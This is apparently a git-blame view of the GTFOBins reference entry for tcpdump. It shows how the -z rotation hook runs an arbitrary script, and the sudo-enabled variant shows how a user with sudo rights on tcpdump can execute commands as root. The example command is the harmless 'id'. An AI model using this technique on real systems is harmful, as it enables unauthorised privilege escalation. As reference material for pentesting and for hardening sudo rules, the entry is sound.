GTFOBins.github.io/_gtfobins/tcpdump.md

19 lines
527 B
Markdown
Raw Normal View History

2018-08-17 17:16:09 +02:00
---
2018-09-07 13:01:23 +02:00
description: These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.
2018-08-17 17:16:09 +02:00
functions:
execute-non-interactive:
2018-08-19 10:31:04 +02:00
- code: |
2018-09-07 00:29:58 +02:00
COMMAND='id'
TF=$(mktemp)
2018-08-19 10:31:04 +02:00
echo "$COMMAND" > $TF
chmod +x $TF
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
2018-08-24 18:59:16 +02:00
sudo-enabled:
2018-08-19 10:31:04 +02:00
- code: |
2018-09-07 00:29:58 +02:00
COMMAND='id'
TF=$(mktemp)
2018-08-19 10:31:04 +02:00
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
2018-08-17 17:16:09 +02:00
---